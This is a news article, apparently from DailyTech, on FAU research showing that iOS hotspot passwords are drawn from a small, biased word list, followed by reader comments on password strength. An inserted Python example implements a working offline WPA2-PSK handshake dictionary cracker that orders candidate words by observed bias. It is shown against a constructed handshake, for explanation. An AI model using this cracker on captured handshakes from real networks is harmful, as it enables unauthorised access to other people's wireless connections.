
Refined version of attack using collected WPA2 handshakes can succeed in

Security researchers at Germany's Friedrich-Alexander-Universität Erlangen-Nürnberg (FAU), in Bavaria, have shown how surprisingly insecure the automatic hotspot password generation in Apple, Inc.'s (AAPL) iOS is.

Using an iOS app written in Apple's own Xcode development environment, the team analyzed the words that iOS draws on when it generates a Personal Hotspot password.  The hotspot uses standard WPA2-PSK: the password is the pre-shared key (PSK) from which the session keys are derived.  The password itself never crosses the air, but the WPA2 four-way handshake a client performs when it joins can be captured, and it contains enough material to test candidate passwords offline.

The problem is that the passwords are built from a small list of "random" words -- around 1,842 by the German team's estimate.  Further, the generator that picks from the list is poor, so some words are chosen far more often than others, and an attacker who tries the favoured words first covers most generated passwords with a fraction of the list.  Thus most hotspot passwords can be cracked very fast -- in as little as "50 seconds" against a captured handshake on a GPU cluster, according to the team.


The team describes the app, available from FAU, as follows:

This app assists in generating an iOS hotspot cracking word list, which might be used in subsequent attacks on other hotspot users. The app also gives explanations and hints on how to crack a captured WPA2 handshake using well-known password crackers. Future releases might also automate the process of capturing and cracking hotspot passwords. As computing power on smart devices is limited, one solution is to involve online password cracking services like CloudCracker, to crack hotspot passwords on-the-fly.
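The two technical points above (a small, biased word list, and a captured WPA2 handshake that lets candidates be tested offline) are easiest to see in code. The following is an added example written for this page; it is not the FAU app and not code from the article. It assumes the passphrase shape the FAU paper describes (a short English word followed by four digits), and everything else is constructed in-process: the SSID "Demo iPhone", the MAC addresses, the nonces, the secret passphrase "coast4471", and the OBSERVED list standing in for passwords the attacker has watched devices generate. The key derivation (PBKDF2-HMAC-SHA1 to a PMK, the 802.11i PRF to a PTK, HMAC-SHA1 over EAPOL-Key message 2 for the MIC) is what aircrack-ng, hashcat and services like CloudCracker do per candidate.

```python
"""Offline dictionary attack on a WPA2-PSK four-way handshake, shaped like the
FAU finding: candidate = short English word + four digits, words tried in the
order a biased generator favours them.  Everything here is constructed
in-process (example code, not the FAU app); nothing is captured off the air."""
import hashlib
import hmac
import struct
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# EAPOL header (4) + descriptor fields preceding Key MIC (1+2+2+8+32+16+8+8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes):
    the expensive step, and the one GPU crackers parallelise."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(PMK, label || 0x00 || min/max(MACs) || min/max(nonces) || i)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = first 16 bytes, KEK = next 16, TK = next 16


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, kck: Optional[bytes] = None) -> bytes:
    """Minimal EAPOL-Key message 2 (no Key Data).  With kck given, the Key MIC
    field is filled in as the client would; otherwise it stays zeroed."""
    body = (struct.pack("!BHHQ", 2, 0x010A, 0, 1)      # descriptor type, key info, key len, replay ctr
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + bytes(16) + struct.pack("!H", 0))          # MIC placeholder, key data length
    frame = struct.pack("!BBH", 2, 3, len(body)) + body  # EAPOL v2, type EAPOL-Key
    if kck is not None:
        frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return frame


@dataclass(frozen=True)
class Handshake:
    """What a cracker recovers from a capture: SSID, both MACs, both nonces,
    message 2 with its MIC zeroed, and the MIC the client actually sent."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol2_zeroed: bytes
    mic: bytes


def check_candidate(hs: Handshake, passphrase: str) -> bool:
    """The per-candidate test every WPA2 dictionary cracker performs."""
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol2_zeroed), hs.mic)


def word_priority(observed: list) -> list:
    """Order words by how often they appeared in passwords already seen generated:
    with a biased picker, the top few words cover most of the output."""
    counts = Counter(p.rstrip("0123456789") for p in observed)
    return [w for w, _ in counts.most_common()]


def crack(hs: Handshake, words: list, digit_range=range(10000)):
    """Try word+NNNN in priority order.  Returns (passphrase, tries) or (None, tries)."""
    tries = 0
    for word in words:
        for d in digit_range:
            tries += 1
            cand = f"{word}{d:04d}"
            if check_candidate(hs, cand):
                return cand, tries
    return None, tries


def demo_handshake(passphrase: str = "coast4471", ssid: str = "Demo iPhone") -> Handshake:
    """Constructed capture: a client joining with the given (secret) passphrase."""
    ap_mac, sta_mac = bytes.fromhex("02aa00000001"), bytes.fromhex("02bb00000002")
    anonce, snonce = hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest()
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    sent = build_eapol_msg2(snonce, kck)  # what goes over the air
    mic = sent[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = sent[:MIC_OFFSET] + bytes(16) + sent[MIC_OFFSET + 16:]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, zeroed, mic)


# Constructed sample of previously generated hotspot passwords (attacker's own devices).
OBSERVED = ["coast1203", "coast9981", "head4410", "coast0007",
            "suave3190", "head7731", "coast5555", "hazard2221"]

if __name__ == "__main__":
    hs = demo_handshake()
    order = word_priority(OBSERVED)  # favoured word first: ['coast', 'head', ...]
    # Digit window narrowed to keep the demo fast; a real run walks all 10,000 per word.
    found, tries = crack(hs, order, digit_range=range(4400, 4500))
    print(f"word order {order}; recovered {found!r} after {tries} PBKDF2 evaluations")
```

The cost is entirely in pmk_from_passphrase: 1,842 words times 10,000 digit suffixes is about 18.4 million PBKDF2 evaluations, which is why the team quotes a GPU cluster rather than a phone for the 50-second figure. The bias is what makes the attack practical in the first place: word_priority puts the words a skewed generator favours at the front of the queue, so most captured handshakes fall long before the list is exhausted.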

Apple has a bit of a history of poor security awareness when it comes to passwords; at one point it stored the passwords for some OS X features in plaintext.  But lest Apple be singled out for admonishment, the team also writes that other mobile operating systems appear to have similar flaws: "Spot tests show that other mobile platforms are also affected by similar problems. We conclude that more care should be taken to create secure passwords even in PSK scenarios."

Thus it's quite possible that similar security flaws could exist in Google Inc.'s (GOOG) Android, which could be even worse, in practice, thanks to carriers' sluggish pace of security updates for Android.

In recent months hackers have also announced upcoming presentations on how to gain root access to iPhones via malicious (USB) chargers.

Source: FAU [Germany]


hmmm
By TheEinstein on 6/19/2013 4:40:19 PM , Rating: 2
With variable length words some words will naturally be less occurring and other smaller ones will occur more often in a fixed length password.

Not using a number or two is also troubling as those can quickly add to the potential variables.

Of course someone will want symbols, to which I say "hogwash". Just increase the length so the user has an option of using a saying popular with them; "2beornot2beisthequestion" is sufficiently difficult for some hacker to guess. On a side note I need a new password... does "thereisnosuchthingas2muchbeer" sound good?

RE: hmmm
By MERKJONES on 6/19/2013 4:54:02 PM , Rating: 2
That's actually my old password. As I got older and higher level into IT I swapped beer for whiskey.

RE: hmmm
By marvdmartian on 6/20/2013 7:52:09 AM , Rating: 3
Still better than my password, which is 12345. Coincidentally, that's the same password I use on my luggage locks!

RE: hmmm
By toffty on 6/20/2013 1:13:57 PM , Rating: 2
Mine is impossible to crack! It's "apassword"

You see, hackers assume it's "password" but never think to add "a" before it!

RE: hmmm
By bitterman0 on 6/20/2013 2:38:04 PM , Rating: 2
Nice Spaceballs reference!

RE: hmmm
By fic2 on 6/19/2013 4:58:55 PM , Rating: 2
You should read the Ars password hacking series of articles. It is pretty eye opening as to how fast hackers and gpus can crack even hashed passwords. Using words with number substitutes for "for/4" and "two/too/2" is one of the patterns they crunch through. Also, numbers as letters (e/E/3, S/s/5, o/O/0) and numbers separating words.

One hacker unscrambled about 13,500 of 16,500 hashes in an hour.

RE: hmmm
By ritualm on 6/19/2013 7:51:30 PM , Rating: 2
The best password is also one that is all but impossible for most humans to remember without external assistance / neural implants.

In other words, your proposed long password is too easy to figure out.

RE: hmmm
By TheEinstein on 6/19/2013 11:37:39 PM , Rating: 2

900,000 words in the English Language

Thereisnosuchthingas2muchbeer consists of 9 words (1 altered)

Brute forcing it consists of 29 characters of which if just caps, numbers and letters means roughly 90 total options.

Using words it is 900000^9 total outcomes
Using brute force it is 90^29 total outcomes.

Oh wait, thats not correct. you see a hacker has to assume smaller outcomes as well, so now we have:

Words: (900000^9)+(900000^8)+(900000^7)+(900000^6)+(900000 ^5) (we will assume 5 minimum words)

Letters (90^40)+(90^39)+(90^38)...(90^12)+(90^11)+(90^10)

Ofc they start small and work their way up so they won't ever hit the maximum.

However, words can be trumped by an on-purpose typo which is known to the typist.

Even assuming a 10gigabyte/sec connection with substandard security (no limits on tries) and a network able to maximize number of efforts this is still a daunting task.

Also remember word based password cracking requires bandwidth per letter of the words, it literally takes far longer with a long password than brute forcing a minute 6 character password.

My preview shows a lot of bold but I am not using a < tag > there...

RE: hmmm
By ComputerJuice on 6/20/2013 3:09:22 AM , Rating: 1
Everything's gone bold! Bitchin'!

RE: hmmm
By maugrimtr on 6/20/2013 8:57:00 AM , Rating: 2
It's bold because the input filter is misbehaving

Try it now ;).

RE: hmmm
By Solandri on 6/20/2013 1:50:44 PM , Rating: 3
Yours is the "safety in numbers" reasoning that password crackers love.

Those 900000 words don't all have an equal frequency of usage. About 40,000 of them are used 99% of the time. It'd be foolish for crackers to waste their time on the other 860,000 just to crack an extra 1% of passwords, so they don't even bother.

About 6,000 words are used about 90% of the time. An additional 85% reduction in solution space for a loss of just 9% possible solutions is a pretty good trade-off. So they'll probably do that too.

At this point it becomes a matter of prioritization. Start searching for passphrases using common words, then work your way up through the uncommon words as time permits. Here are the frequency ranks for the words in your 9-word password:

There - #45
is - #14
no - #41
such - #414
thing - #131
as - #153
too - #189
much - #253
beer - #2887

So beer is actually your most difficult word, and falls in the sub-3000 word dictionary.

The too/2 substitution is so common it provides almost zero protection. Crackers check for it as a matter of course. Same thing for first-letter capitalization. That's the second-most common pattern after all-lowercase.

"There is no such thing" is actually a common phrase. Like Google, password crackers build up huge libraries of commonly used terms and phrases, based on the passwords they've cracked. So Thereisnosuchthing would probably only count as a single word in a ~10,000 word/phrase dictionary. Same for toomuch.

So now your mighty password is actually only 4 "words" out of a 10000 word/phrase dictionary, meaning it can be found by searching only 10000^4 passphrases.

Most cracking is done offline - they download the password hash file of a server they've compromised, and work on it at home. A modern high-end GPU can crunch through about a billion hashes a second for a poor hash which is inexplicably still widely used. So your passphrase will fall in about 115 days. If they're serious and have a cluster of GPUs, they're gonna figure it out in less than a day.

Passwords are as much psychological as they are algorithmic. Making a secure password means doing things other people don't do. Make your password as different as possible from the passwords most crackers have run across. Use symbols because most people hate typing them, capitalize randomly, insert meaningless numbers multiple times (i.e. no l33t), avoid common phrases, misspell words in ways they aren't normally misxpelted, mix in a couple infrequently used words like something from Chaucer or a foreign language, etc.

Or as someone below suggests, just use a password manager like lastpass/keepass.

RE: hmmm
By Reclaimer77 on 6/20/2013 2:38:24 AM , Rating: 2
Neural implants? Pssha! I say positronic!

The ULTIMATE password.

"Common GPU cluster"
By half_duplex on 6/20/2013 12:36:44 AM , Rating: 3
I like how the app says "...using a common GPU cluster...".

Yes, because hackers are going to follow iOS users around with their GPU cluster waiting to brute force the iPhone hot spot.

This article is bullshit; even if someone did come to play with a cluster of GPUs, I highly doubt any iOS device could field the requests.

Silliness. Don't these people have anything better to do?

RE: "Common GPU cluster"
By BRB29 on 6/20/2013 7:51:14 AM , Rating: 1
lol every time I read a BS article, I have to check the author. It seems to be the same one every time.

RE: "Common GPU cluster"
By Shadowself on 6/20/2013 8:59:22 AM , Rating: 3
Not surprising.

It's just Jason going off on Apple again: stick up an inflammatory headline about how bad Apple's iOS security is, then bury near the end of the article the fact that virtually every other mobile OS is likely as bad or worse. Typical Jason.

In Jason's defense, most of his articles are not pure BS. They just have a Jason slant. Just read them with your well developed Jason filter set to "HIGH" or "EXTREME" depending upon your personal tastes.

RE: "Common GPU cluster"
By half_duplex on 6/20/2013 9:42:29 AM , Rating: 2
Well, it's not Jason Mick bias or anti-Apple slant that this article sadly exposes, it's his fundamental lack of understanding of the situation that is the problem.

Apple or not, to the infrequent or first time visitor, this type of article is a major red flag as to the quality and validity of the site as a whole.

When the title says the password was cracked in 50 seconds, and you read only to find out that isn't the case at all...

Makes you wonder if the original article that this article cites was truly comprehended.

RE: "Common GPU cluster"
By BRB29 on 6/20/2013 9:46:10 AM , Rating: 2
pure BS to most people is sensationalism to Jason

By Azethoth on 6/19/2013 8:48:41 PM , Rating: 2
Fortunately we can use LastPass (or similar programs) to generate long and random passwords for us and then store them encrypted by our one true strong password that we can remember.

Faster than a summary header
By ProZach on 6/20/2013 4:46:23 PM , Rating: 2
Refined version of attack using collected WPA2 handshakes can succeed in

Lol, it's even fast enough to cut this sentence shor-

Copyright 2016 DailyTech LLC.